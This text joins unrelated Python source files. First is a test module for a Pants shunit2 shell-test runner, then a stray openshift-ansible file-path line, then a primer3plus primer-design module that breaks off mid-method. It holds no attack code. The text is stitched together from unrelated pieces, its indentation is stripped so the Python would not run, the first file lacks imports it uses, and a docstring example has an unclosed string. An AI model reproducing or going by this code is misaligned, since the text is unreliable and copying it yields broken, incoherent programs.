from pants.core.util_rules import source_files
from pants.engine.addresses import Address
from pants.engine.fs import FileContent
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.target import Target
from pants.testutil.python_rule_runner import PythonRuleRunner
from pants.testutil.rule_runner import QueryRule, mock_console
@pytest.fixture
def rule_runner() -> PythonRuleRunner:
return PythonRuleRunner(
rules=[
*shunit2_test_runner.rules(),
*source_files.rules(),
*pex_from_targets.rules(),
*package_pex_binary.rules(),
*python_target_type_rules(),
*target_types_rules(),
build_runtime_package_dependencies,
get_filtered_environment,
QueryRule(TestResult, [Shunit2TestRequest.Batch]),
QueryRule(TestDebugRequest, [Shunit2TestRequest.Batch]),
QueryRule(Shunit2Runner, [Shunit2RunnerRequest]),
],
target_types=[
ShellSourceTarget,
Shunit2TestsGeneratorTarget,
PythonSourcesGeneratorTarget,
PexBinary,
],
)
GOOD_TEST = dedent(
"""\
#!/usr/bin/bash
testEquality() {
assertEquals 1 1
}
"""
)
def run_shunit2(
rule_runner: PythonRuleRunner,
test_target: Target,
*,
extra_args: list[str] | None = None,
env: dict[str, str] | None = None,
) -> TestResult:
rule_runner.set_options(
[
"--backend-packages=pants.backend.shell",
*(extra_args or ()),
],
env=env,
env_inherit={"PATH", "PYENV_ROOT", "HOME"},
)
input: Shunit2TestRequest.Batch = Shunit2TestRequest.Batch(
"", (Shunit2FieldSet.create(test_target),), None
)
test_result = rule_runner.request(TestResult, [input])
debug_request = rule_runner.request(TestDebugRequest, [input])
if debug_request.process is not None:
with mock_console(rule_runner.options_bootstrapper):
debug_result = rule_runner.run_interactive_process(debug_request.process)
assert test_result.exit_code == debug_result.exit_code
return test_result
def test_passing(rule_runner: PythonRuleRunner) -> None:
rule_runner.write_files({"tests.sh": GOOD_TEST, "BUILD": "shunit2_tests(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
result = run_shunit2(rule_runner, tgt)
assert result.exit_code == 0
assert "Ran 1 test.\n\nOK" in result.stdout
def test_failing(rule_runner: PythonRuleRunner) -> None:
rule_runner.write_files(
{
"tests.sh": dedent(
"""\
#!/usr/bin/bash
testEquality() {
assertEquals 1 5
}
"""
),
"BUILD": "shunit2_tests(name='t')",
}
)
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
result = run_shunit2(rule_runner, tgt)
assert result.exit_code == 1
assert "Ran 1 test.\n\nFAILED" in result.stdout
def test_dependencies(rule_runner: PythonRuleRunner) -> None:
"""Ensure direct and transitive dependencies work."""
rule_runner.write_files(
{
"transitive.sh": dedent(
"""\
add_one() {
echo $(($1 + 1))
}
"""
),
"direct.sh": dedent(
"""\
source transitive.sh
add_two() {
echo $(($(add_one $1) + 1))
}
"""
),
"tests.sh": dedent(
"""\
#!/usr/bin/bash
source direct.sh
testAdd() {
assertEquals $(add_two 2) 4
}
"""
),
"BUILD": dedent(
"""\
shunit2_tests(name="t", dependencies=[':direct'])
shell_source(name="direct", source='direct.sh', dependencies=[':transitive'])
shell_source(name="transitive", source='transitive.sh')
"""
),
}
)
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
result = run_shunit2(rule_runner, tgt)
assert result.exit_code == 0
assert "Ran 1 test.\n\nOK" in result.stdout
def test_subdirectories(rule_runner: PythonRuleRunner) -> None:
    # We always download the shunit2 script to the build root - this test is a smoke test that
    # we properly source the file.
rule_runner.write_files({"a/b/c/tests.sh": GOOD_TEST, "a/b/c/BUILD": "shunit2_tests()"})
tgt = rule_runner.get_target(Address("a/b/c", relative_file_path="tests.sh"))
result = run_shunit2(rule_runner, tgt)
assert result.exit_code == 0
assert "Ran 1 test.\n\nOK" in result.stdout
@pytest.mark.skip(
"TODO: figure out why the rule is getting memoized but that doesn't happen with Pytest."
"The Process is not being cached, but the rule invocation is being memoized so the "
"`--force` does not work properly."
)
@pytest.mark.no_error_if_skipped
def test_force(rule_runner: PythonRuleRunner) -> None:
rule_runner.write_files({"tests.sh": GOOD_TEST, "BUILD": "shunit2_tests(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
# Should not receive a memoized result if force=True.
result_one = run_shunit2(rule_runner, tgt, extra_args=["--test-force"])
result_two = run_shunit2(rule_runner, tgt, extra_args=["--test-force"])
assert result_one.exit_code == 0
assert result_two.exit_code == 0
assert result_one is not result_two
# But should if force=False.
result_one = run_shunit2(rule_runner, tgt)
result_two = run_shunit2(rule_runner, tgt)
assert result_one.exit_code == 0
assert result_one is result_two
def test_extra_env_vars(rule_runner: PythonRuleRunner) -> None:
rule_runner.write_files(
{
"tests.sh": dedent(
"""\
#!/usr/bin/bash
testEnv() {
assertEquals "${SOME_VAR}" some_value
assertEquals "${OTHER_VAR}" other_value
}
"""
),
"BUILD": "shunit2_tests(name='t')",
}
)
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
result = run_shunit2(
rule_runner,
tgt,
extra_args=['--test-extra-env-vars=["SOME_VAR=some_value", "OTHER_VAR"]'],
env={"OTHER_VAR": "other_value"},
)
assert result.exit_code == 0
assert "Ran 1 test.\n\nOK" in result.stdout
def test_runtime_package_dependency(rule_runner: PythonRuleRunner) -> None:
rule_runner.write_files(
{
"src/py/main.py": "",
"src/py/BUILD": dedent(
"""\
python_sources()
pex_binary(name='main', entry_point='main.py')
"""
),
"tests.sh": dedent(
"""\
#!/usr/bin/bash
testArchive() {
assertTrue "[[ -f src.py/main.pex ]]"
# Ensure the pex's dependencies are not included, only the final result.
assertFalse "[[ -f src/py/main.py ]]"
}
"""
),
"BUILD": "shunit2_tests(name='t', runtime_package_dependencies=['src/py:main'])",
}
)
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
result = run_shunit2(rule_runner, tgt)
assert result.exit_code == 0
assert "Ran 1 test.\n\nOK" in result.stdout
def test_determine_shell_runner(rule_runner: PythonRuleRunner) -> None:
addr = Address("", target_name="t")
fc = FileContent("tests.sh", b"#!/usr/bin/env sh")
rule_runner.set_options([], env_inherit={"PATH"})
# If `shell` field is not set, read the shebang.
result = rule_runner.request(
Shunit2Runner, [Shunit2RunnerRequest(addr, fc, Shunit2ShellField(None, addr))]
)
assert result.shell == Shunit2Shell.sh
# The `shell` field overrides the shebang.
result = rule_runner.request(
Shunit2Runner, [Shunit2RunnerRequest(addr, fc, Shunit2ShellField("bash", addr))]
)
assert result.shell == Shunit2Shell.bash
# Error if not set.
with pytest.raises(ExecutionError) as exc:
rule_runner.request(
Shunit2Runner,
[
Shunit2RunnerRequest(
addr, FileContent("tests.sh", b""), Shunit2ShellField(None, addr)
)
],
)
assert f"Could not determine which shell to use to run shunit2 on {addr}" in str(exc.value)
|
/root/nfs/jooho/openshift-ansible/library/modify_yaml.py
|
"""Core design modules.
For examples of how to use the design module, see the :doc:`Usage Docs <../usage>`.
For a list of design parameters available, take a look at the
:ref:`BoulderIO Parameters <api_default_parameters>`
.. code-block:: python
# a new task
design = Design()
# set template sequence
design.settings.template("AGGTTGCGTGTGTATGGTCGTGTAGTGTGT")
# set left primer sequence
design.settings.left_sequence("GTTGCGTGTGT)
# set as a cloning task
design.settings.as_cloning_task()
# run the design task
design.run()
"""
import re
import webbrowser
from typing import Any
from typing import Dict
from typing import List
from typing import Tuple
from typing import Union
from warnings import warn
import primer3
from .interfaces import AllParameters
from .interfaces import ParameterAccessor
from .results import parse_primer3_results
from primer3plus.constants import DOCURL
from primer3plus.exceptions import Primer3PlusException
from primer3plus.exceptions import Primer3PlusRunTimeError
from primer3plus.exceptions import Primer3PlusWarning
from primer3plus.log import logger
from primer3plus.params import BoulderIO
from primer3plus.params import default_boulderio
from primer3plus.utils import anneal as anneal_primer
from primer3plus.utils import depreciated_warning
class DesignPresets:
"""Interface for setting design parameters. This is typically accessed from
a :class:`Design <primer3plus.Design>` instance's.
:meth:`Design <primer3plus.Design.set>` method. As in:
.. code-block::
design = Design()
design.settings.left_sequence("AGGGAGATAGATA")
design.run()
"""
def __init__(self, design):
"""Initializes a new interface from a.
:class:`~primer3plus.design.Design`.
:param design: The design
"""
self._design = design
def _resolve(self):
"""Process any extra parameters and process BoulderIO so that it is
digestable by primer3."""
if self._design.PRIMER_USE_OVERHANGS.value:
self._resolve_overhangs(self._design.PRIMER_MIN_ANNEAL_CHECK.value)
if self._design.PRIMER_LONG_OK.value:
self._resolve_max_lengths(lim=BoulderIO.PRIMER_MAX_SIZE_HARD_LIM)
self._resolve_product_sizes()
if not self._design.PRIMER_USE_OVERHANGS.value:
if self._design.SEQUENCE_PRIMER_OVERHANG.value:
warn(
Primer3PlusWarning(
"{} is non-empty (value={}) but {} was False. Overhang was"
" ignored".format(
self._design.SEQUENCE_PRIMER_OVERHANG.name,
self._design.SEQUENCE_PRIMER_OVERHANG.value,
self._design.PRIMER_USE_OVERHANGS.name,
)
)
)
if self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value:
warn(
Primer3PlusWarning(
"{} is non-empty (value={}) but {} was False. Overhang was"
" ignored".format(
self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.name,
self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value,
self._design.PRIMER_USE_OVERHANGS.name,
)
)
)
return self
def _post_parse(self, pairs, explain) -> None:
"""Modify results from design parameters (e.g. overhangs)"""
left_long_overhang = self._design._SEQUENCE_LONG_OVERHANG.value
right_long_overhang = self._design._SEQUENCE_REVCOMP_LONG_OVERHANG.value
for pair in pairs.values():
for x in ["LEFT", "RIGHT"]:
pair[x].setdefault("OVERHANG", "")
            if self._design.PRIMER_USE_OVERHANGS.value:
pair["LEFT"]["OVERHANG"] = self._design.SEQUENCE_PRIMER_OVERHANG.value
pair["RIGHT"][
"OVERHANG"
] = self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value
if left_long_overhang:
pair["LEFT"]["SEQUENCE"] = (
left_long_overhang + pair["LEFT"]["SEQUENCE"]
)
pair["LEFT"]["OVERHANG"] = pair["LEFT"]["OVERHANG"][
: -len(left_long_overhang)
]
pair["PAIR"]["PRODUCT_SIZE"] += len(left_long_overhang)
loc = pair["LEFT"]["location"]
pair["LEFT"]["location"] = [
loc[0] - len(left_long_overhang),
len(pair["LEFT"]["SEQUENCE"]),
]
if right_long_overhang:
pair["RIGHT"]["SEQUENCE"] = (
right_long_overhang + pair["RIGHT"]["SEQUENCE"]
)
pair["RIGHT"]["OVERHANG"] = pair["RIGHT"]["OVERHANG"][
: -len(right_long_overhang)
]
pair["PAIR"]["PRODUCT_SIZE"] += len(right_long_overhang)
loc = pair["RIGHT"]["location"]
pair["RIGHT"]["location"] = [
loc[0] + len(right_long_overhang),
len(pair["RIGHT"]["SEQUENCE"]),
]
def _interval_from_sequences(
self, template: str, target: str
) -> Union[None, Tuple[int, int]]:
if isinstance(target, str):
matches = self._get_index_of_match(template, target)
if not matches:
print("Target not in template")
return None
if len(matches) > 1:
print("More than one target found")
return None
return matches[0]
@staticmethod
def _get_index_of_match(template: str, sequence: str) -> List[Tuple[int, int]]:
matches = []
for m in re.finditer(sequence, template, re.IGNORECASE):
matches.append((m.start(0), m.end(0)))
return matches
def update(self, update: Dict[str, Any]):
"""Update an arbitrary parameter."""
self._design.params.update(update)
return self
def task(self, task: str) -> "DesignPresets":
"""This tag tells primer3 what task to perform.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_TASK
:param task: the task name
:return self
"""
self.update({"PRIMER_TASK": task})
return self
def as_cloning_task(self) -> "DesignPresets":
"""Set the design as a cloning task.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_TASK
:return: self
"""
return self.task("pick_cloning_primers")
def as_generic_task(self) -> "DesignPresets":
"""Set the design as a generic task.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_TASK
:return: self
"""
return self.task("generic")
def template(self, template: str) -> "DesignPresets":
"""Set the template sequence for the design. This sets the
'SEQUENCE_TEMPLATE' parameter.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TEMPLATE
:param template: the template sequence
:return: self
"""
self.update({"SEQUENCE_TEMPLATE": template})
return self
# TODO: set_iterations, set_num_return, set_force_return, set_gradient
def primer_num_return(self, n: int) -> "DesignPresets":
"""Set the number of primers to return for the design task.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_NUM_RETURN
:param n: number of primers to return
:return: self
"""
return self.update({"PRIMER_NUM_RETURN": n})
def product_size(
self, interval: Union[Tuple[int, int], List[Tuple[int, int]]], opt=None
) -> "DesignPresets":
"""Set the product size. Optionally include the optimal size.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PRODUCT_SIZE_RANGE
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PRODUCT_OPT_SIZE
:param interval: a tuple of <min>,<max> or a list of such tuples
:param opt: optional product size as an int.
:return: self
"""
if isinstance(interval, tuple):
interval = [interval]
if opt is not None:
return self.update(
{"PRIMER_PRODUCT_SIZE_RANGE": interval, "PRIMER_PRODUCT_OPT_SIZE": opt}
)
return self.update({"PRIMER_PRODUCT_SIZE_RANGE": interval})
def pair_region_list(
self, region_list: List[Tuple[int, int, int, int]]
) -> "DesignPresets":
"""The list of regions from which to design primers.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER_PAIR_OK_REGION_LIST
:param region_list: list of regions
:return: self
"""
return self.update({"SEQUENCE_PRIMER_PAIR_OK_REGION_LIST": region_list})
def left_sequence(self, primer: str) -> "DesignPresets":
"""The sequence of a left primer to check and around which to design
right primers and optional internal oligos. Must be a substring of
SEQUENCE_TEMPLATE.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER
:param primer: the primer sequence
:return: self
"""
return self.update({"SEQUENCE_PRIMER": primer, "PRIMER_PICK_RIGHT_PRIMER": 1})
def right_sequence(self, primer: str) -> "DesignPresets":
"""The sequence of a right primer to check and around which to design
left primers and optional internal oligos. Must be a substring of the
reverse strand of SEQUENCE_TEMPLATE.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER_REVCOMP
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER
:param primer: the primer sequence
:return: self
"""
return self.update(
{"SEQUENCE_PRIMER_REVCOMP": primer, "PRIMER_PICK_LEFT_PRIMER": 1}
)
@staticmethod
def _trim_long(overhang: str, anneal: str, lim: int) -> Tuple[str, str, str]:
"""Fix the overhang and anneal from the hardcoded BoulderIO primer
lim."""
return overhang, anneal[:-lim], anneal[-lim:]
def _get_left_overhang(self, min_primer_anneal: int):
left = self._design.SEQUENCE_PRIMER.value
if left:
fwd, _ = anneal_primer(
self._design.SEQUENCE_TEMPLATE.value, [left], n_bases=min_primer_anneal
)
if len(fwd) == 0:
raise Primer3PlusRunTimeError("No annealing found for left sequence.")
elif len(fwd) > 1:
raise Primer3PlusRunTimeError(
"More than one annealing found for left sequence."
)
overhang = fwd[0]["overhang"]
anneal = fwd[0]["anneal"]
return overhang, anneal
else:
return "", left
def _get_right_overhang(self, min_primer_anneal: int):
right = self._design.SEQUENCE_PRIMER_REVCOMP.value
if right:
_, rev = anneal_primer(
self._design.SEQUENCE_TEMPLATE.value, [right], n_bases=min_primer_anneal
)
if len(rev) == 0:
raise Primer3PlusRunTimeError("No annealing found for right sequence.")
elif len(rev) > 1:
raise Primer3PlusRunTimeError(
"More than one annealing found for right "
"sequence {}.".format(self._design.SEQUENCE_PRIMER_REVCOMP)
)
overhang = rev[0]["overhang"]
anneal = rev[0]["anneal"]
return overhang, anneal
else:
return "", right
def left_overhang(self, overhang: str) -> "DesignPresets":
"""Sets the left overhang sequence for the primer. This overhang will.
*always* be in the overhang sequence regardless of other parameters.
If using a primer that anneals with an overhang, this value will
be appended to the 5' end of the overhang.
:param overhang: overhang sequence
:return: self
"""
return self.update({"SEQUENCE_PRIMER_OVERHANG": overhang})
def right_overhang(self, overhang: str) -> "DesignPresets":
"""Sets the right overhang sequence for the primer. This overhang will.
*always* be in the overhang sequence regardless of other parameters.
If using a primer that anneals with an overhang, this value will
be appended to the 5' end of the overhang.
:param overhang: overhang sequence
:return: self
"""
return self.update({"SEQUENCE_PRIMER_REVCOMP_OVERHANG": overhang})
def use_overhangs(self, b: bool = True) -> "DesignPresets":
"""Set the BoulderIO to process overhangs.
:param b: boolean to set
:return: self
"""
return self.update({"PRIMER_USE_OVERHANGS": b})
def long_ok(self, b: bool = True) -> "DesignPresets":
"""Set the BoulderIO to process long primers.
:param b: boolean to set
:return: self
"""
return self.update({"PRIMER_LONG_OK": b})
def _resolve_product_sizes(self):
"""If there are long primers being used, the product_size is no longer
valid as the trimmed sequence is no longer represented in the
originally provided product size.
        This re-adjusts the product size to correspond to the adjusted
        parameters.
"""
# adjust product size range
left_long_overhang = self._design._SEQUENCE_LONG_OVERHANG.value
right_long_overhang = self._design._SEQUENCE_REVCOMP_LONG_OVERHANG.value
product_sizes = self._design.PRIMER_PRODUCT_SIZE_RANGE.value
x = len(left_long_overhang) + len(right_long_overhang)
if isinstance(product_sizes[0], tuple):
new_product_sizes = []
for size in product_sizes:
new_product_sizes.append((size[0] - x, size[1] - x))
self._design.PRIMER_PRODUCT_SIZE_RANGE.value = new_product_sizes
else:
size = self._design.PRIMER_PRODUCT_SIZE_RANGE.value
self._design.PRIMER_PRODUCT_SIZE_RANGE.value = [size[0] - x, size[1] - x]
def _resolve_max_lengths(self, lim: int):
"""Fixes the annealing and overhang sequences for annealing sequences
for primers over the :attr:`BoulderIO.
<primer3plus.paramsBoulderIO.PRIMER_MAX_SIZE_HARD_LIM>`.
Should always be run *after* :meth:`_resolve_overhangs`.
"""
left_anneal = self._design.SEQUENCE_PRIMER.value
right_anneal = self._design.SEQUENCE_PRIMER_REVCOMP.value
left_over = self._design.SEQUENCE_PRIMER_OVERHANG.value
right_over = self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value
left_over, left_long_overhang, left_anneal = self._trim_long(
left_over, left_anneal, lim=lim
)
right_over, right_long_overhang, right_anneal = self._trim_long(
right_over, right_anneal, lim=lim
)
self.left_overhang(left_over + left_long_overhang)
self.right_overhang(right_over + right_long_overhang)
# save the sequences that were trimmed
# TODO: will need to re-add these in the results in overhang, product size, and anneal
# TODO: adjust the product_size
# TODO: adjust any other regions
# TODO: re-adjust tm and add any warnings
# save values for long overhangs
self._left_long_overhang(left_long_overhang)
self._right_long_overhang(right_long_overhang)
self.left_sequence(left_anneal)
self.right_sequence(right_anneal)
def _left_long_overhang(self, x):
self.update({"_SEQUENCE_LONG_OVERHANG": x})
def _right_long_overhang(self, x):
self.update({"_SEQUENCE_REVCOMP_LONG_OVERHANG": x})
def _resolve_overhangs(self, min_primer_anneal: int):
"""Sets the annealing and overhang sequences."""
left_over, left_anneal = self._get_left_overhang(min_primer_anneal)
_loverhang = self._design.SEQUENCE_PRIMER_OVERHANG.value
if _loverhang:
left_over = _loverhang + left_over
# raise ValueError(
# "Left overhang already set to '{}'.".format(_loverhang)
# )
right_over, right_anneal = self._get_right_overhang(min_primer_anneal)
_roverhang = self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value
if _roverhang:
right_over = _roverhang + right_over
# raise ValueError(
# "Right overhang already set to '{}'.".format(_roverhang)
# )
self.left_overhang(left_over)
self.right_overhang(right_over)
self.left_sequence(left_anneal)
self.right_sequence(right_anneal)
def pick_left_only(self) -> "DesignPresets":
"""Design only the left primer.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER
:return: self
"""
return self.update(
{"PRIMER_PICK_LEFT_PRIMER": 1, "PRIMER_PICK_RIGHT_PRIMER": 0}
)
def pick_right_only(self) -> "DesignPresets":
"""Design only the right primer.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER
:return: self
"""
return self.update(
{"PRIMER_PICK_LEFT_PRIMER": 0, "PRIMER_PICK_RIGHT_PRIMER": 1}
)
def internal_sequence(self, primer: str) -> "DesignPresets":
"""The sequence of an internal oligo to check and around which to
design left and right primers. Must be a substring of
SEQUENCE_TEMPLATE.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_INTERNAL_OLIGO
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_INTERNAL_OLIGO
        :param primer: the internal oligo sequence
        :return: self
"""
return self.update(
{"SEQUENCE_INTERNAL_OLIGO": primer, "PRIMER_PICK_INTERNAL_OLIGO": 1}
)
def primers(self, p1: str, p2: str) -> "DesignPresets":
"""Set the left and right primer sequences.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER_REVCOMP
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER
        :param p1: the left primer sequence
        :param p2: the right primer sequence
        :return: self
"""
if p1:
self.left_sequence(p1)
if p2:
self.right_sequence(p2)
return self
def primers_with_overhangs(self, p1: str, p2: str) -> "DesignPresets":
if p1:
self.left_sequence_with_overhang(p1)
if p2:
self.right_sequence_with_overhang(p2)
return self
def _parse_interval(
self, interval: Union[str, Tuple[int, int], List[Tuple[int, int]]]
) -> List[Tuple[int, int]]:
if isinstance(interval, str):
interval = self._interval_from_sequences(
self._design.params["SEQUENCE_TEMPLATE"], interval
)
if isinstance(interval, tuple):
interval = [interval]
return interval
def included(self, interval: Union[str, Tuple[int, int]]) -> "DesignPresets":
"""Specify interval from which primers must be selected. A sub-region
of the given sequence in which to pick primers. For example, often the
first dozen or so bases of a sequence are vector, and should be
        excluded from consideration. The value for this parameter has the form
        <start>,<length>, where <start> is the index of the first base to consider and
        <length> is the number of subsequent bases in the primer-picking region.
        http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_INCLUDED_REGION
:param interval: One of the following: the sequence of the target region,
a tuple of the interval of <start>,<length> or a str
:return: self
"""
if isinstance(interval, str):
interval = self._interval_from_sequences(
self._design.params["SEQUENCE_TEMPLATE"], interval
)
        if not isinstance(interval, (tuple, list)) or len(interval) != 2:
            raise TypeError(
                "Expected a tuple or list of length 2 but found {}".format(interval)
            )
interval = list(interval)
return self.update({"SEQUENCE_INCLUDED_REGION": interval})
def target(
self, interval: Union[str, Tuple[int, int], List[Tuple[int, int]]]
) -> "DesignPresets":
"""Specify the interval that designed primers must flank. If one or
more targets is specified then a legal primer pair must flank at least
one of them. A target might be a simple sequence repeat site (for
example a CA repeat) or a single-base-pair polymorphism, or an exon for
        resequencing. The value should be a space-separated list of
        <start>,<length> pairs, where <start> is the index of the first base of
        a target and <length> is its length. See also PRIMER_INSIDE_PENALTY,
PRIMER_OUTSIDE_PENALTY. PRIMER_TASK=pick_sequencing_primers. See
PRIMER_TASK for more information.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TEMPLATE
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TARGET
:param interval: One of the following: the sequence of the target region,
a tuple of the interval of <start>,<length>, or a list of
tuples of <start>,<length>
:return self
"""
return self.update({"SEQUENCE_TARGET": self._parse_interval(interval)})
def excluded(
self, interval: Union[str, Tuple[int, int], List[Tuple[int, int]]]
) -> "DesignPresets":
"""Primers and oligos may not overlap any region specified in this tag.
The associated value must be a space-separated list of <start>,<length>
pairs where <start> is the index of the first base of the excluded
region, and <length> is its length. This tag is useful for tasks such
as excluding regions of low sequence quality or for excluding regions
containing repetitive elements such as ALUs or LINEs.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TEMPLATE
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_EXCLUDED_REGION
:param interval: One of the following: the sequence of the target region,
a tuple of the interval of <start>,<length>, or a list of
tuples of <start>,<length>
:return: self
"""
return self.update({"SEQUENCE_EXCLUDED_REGION": self._parse_interval(interval)})
def pick_anyway(self, b=1) -> "DesignPresets":
"""If true use primer provided in SEQUENCE_PRIMER,
SEQUENCE_PRIMER_REVCOMP, or SEQUENCE_INTERNAL_OLIGO even if it violates
specific constraints.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_ANYWAY
:param b: default True
:return self
"""
return self.update({"PRIMER_PICK_ANYWAY": b})
def clip(x, mn, mx):
return max(min(x, mx), mn)
class DesignBase:
"""Base design."""
DEFAULT_PARAMS = default_boulderio #: default parameters
DEFAULT_GRADIENT = dict(
PRIMER_MAX_SIZE=(1, DEFAULT_PARAMS["PRIMER_MAX_SIZE"], 36),
PRIMER_MIN_SIZE=(-1, 16, DEFAULT_PARAMS["PRIMER_MAX_SIZE"]),
        PRIMER_MAX_TM=(1, DEFAULT_PARAMS["PRIMER_MAX_TM"], 80),
PRIMER_MIN_TM=(-1, 48, DEFAULT_PARAMS["PRIMER_MIN_TM"]),
PRIMER_MAX_HAIRPIN_TH=(1, DEFAULT_PARAMS["PRIMER_MAX_HAIRPIN_TH"], 60),
) #: the default gradient to use for the :meth:`Design.run_and_optimize` method.
_CHECK_PRIMERS = "check_primers"
_GENERIC = "generic"
_PICK_PRIMER_LIST = "pick_primer_list"
_PICK_SEQUENCING_PRIMERS = "pick_sequencing_primers"
_PICK_CLONING_PRIMERS = "pick_cloning_primers"
_PICK_DISCRIMINATIVE_PRIMERS = "pick_discriminative_primers"
def __init__(
self,
gradient: Dict[
str, Tuple[Union[float, int], Union[float, int], Union[float, int]]
] = None,
params: BoulderIO = None,
quiet_runtime: bool = False,
):
"""Initializes a new design.
:param gradient: the design gradient.
        :param quiet_runtime: if True, silently ignore any runtime errors.
"""
if params is None:
params = self.DEFAULT_PARAMS.copy()
self.params = params
self.logger = logger(self)
self.gradient = gradient
self.quiet_runtime = quiet_runtime
def _raise_run_time_error(self, msg: str) -> Primer3PlusRunTimeError:
"""Raise a Primer3PlusRunTime exception. If parameters are named in the
msg, print off some debugging information at the end of the message.
:param msg: the error msg
:return: the run time exception
"""
parameter_explain = set()
for name, value in self.params._params.items():
if name in msg:
parameter_explain.add("\t" + str(value))
parameter_explain = sorted(parameter_explain)
return Primer3PlusRunTimeError(msg + "\n" + "\n".join(parameter_explain))
def _run(self, params: BoulderIO = None) -> Tuple[List[Dict], List[Dict]]:
"""Design primers. Optionally provide additional parameters.
:param params:
:return: results
"""
if params is None:
params = self.params
try:
res = primer3.bindings.designPrimers(params._sequence(), params._globals())
except OSError as e:
if not self.quiet_runtime:
raise self._raise_run_time_error(str(e)) from e
else:
return {}, {"PRIMER_ERROR": str(e)}
except Primer3PlusRunTimeError as e:
if not self.quiet_runtime:
raise self._raise_run_time_error(str(e)) from e
else:
return {}, {"PRIMER_ERROR": str(e)}
except Primer3PlusException as e:
raise self._raise_run_time_error(str(e)) from e
pairs, explain = parse_primer3_results(res)
self.settings._post_parse(pairs, explain)
return pairs, explain
def run(self) -> Tuple[List[Dict], List[Dict]]:
"""Design primers. Optionally provide additional parameters.
:param params:
:return: results
"""
return self._run()
def run_and_optimize(
self,
max_iterations,
params: BoulderIO = None,
gradient: Dict[
str, Tuple[Union[float, int], Union[float, int], Union[float, int]]
] = None,
run_kwargs: dict = None,
) -> Tuple[List[dict], List[dict]]:
"""Design primers and relax constraints. If primer design is
unsuccessful, relax parameters as defined in
primer3plust.Design.DEFAULT_GRADIENT. Repeat for the specified number
of max_iterations.
:param max_iterations: the max number of iterations to perform relaxation
:param params: optional parameters to provide
:param gradient: optional gradient to provide. If not provided,
            Design.DEFAULT_GRADIENT will be used. The gradient is a
            dictionary of 3-tuples: (step, min, max).
:return: results
"""
if gradient is None:
gradient = self.gradient or self.DEFAULT_GRADIENT
if params is None:
params = self.params
pairs, explain = self._run(params)
i = 0
while i < max_iterations and len(pairs) == 0:
i += 1
update = self._update_dict(params, gradient=gradient)
if update:
self.logger.info("Updated: {}".format(update))
else:
self.logger.info("Reached end of gradient.")
break
self.params.update(update)
pairs, explain = self._run(params)
return pairs, explain
@staticmethod
def _update_dict(params, gradient):
update = {}
for param_key, gradient_tuple in gradient.items():
delta, mn, mx = gradient_tuple
try:
val = params[param_key] + delta
val = clip(val, mn, mx)
if params[param_key] != val:
update[param_key] = val
except Exception as e:
raise e
return update
@staticmethod
def open_help():
"""Open the documentation help in a new browser tab."""
webbrowser.open(DOCURL)
def copy(self):
"""Copy this design and its parameters."""
designer = self.__class__()
        designer.params = self.params.copy()
        return designer
def __copy__(self):
return self.copy()
class RestoreAfterRun:
"""Class to restore boulderio to its original parameters after a run."""
def __init__(self, boulderio):
self.params = boulderio
def __enter__(self):
for v in self.params._params.values():
v.hold_restore()
def __exit__(self, a, b, c):
for v in self.params._params.values():
v.restore()
class Design(DesignBase, AllParameters):
def __init__(self):
"""Initialize a new design. Set parameters using.
:attr:`Design.settings`, which
returns an instance of
:class:`DesignPresets <primer3plus.design.DesignPresets>`.
Alternatively, parameters can be accessed more directly using
the name of the parameter descriptor. For a list of parameters available, see
:ref:`BoulderIO Parameters <api_default_parameters>`.
.. code-block::
design = Design()
design.settings.template("AGGCTGTAGTGCTTGTAGCTGGTTGCGTTACTGTG")
design.settings.left_sequence("GTAGTGCTTGTA")
design.SEQUENCE_ID.value = "MY ID"
design.run()
"""
super().__init__()
self._settings = DesignPresets(self)
def set(self, key, value):
self.params.defs[key].value = value
def get(self, key):
return self.params.defs[key]
@property
def settings(self) -> "DesignPresets":
"""Return the :class:`DesignPresets <primer3plus.design.DesignPresets>`
instance for this design."""
return self._settings
@property
def presets(self):
depreciated_warning("'presets' has been renamed to 'settings'")
return self.settings
def update(self, data: Dict[str, Any]):
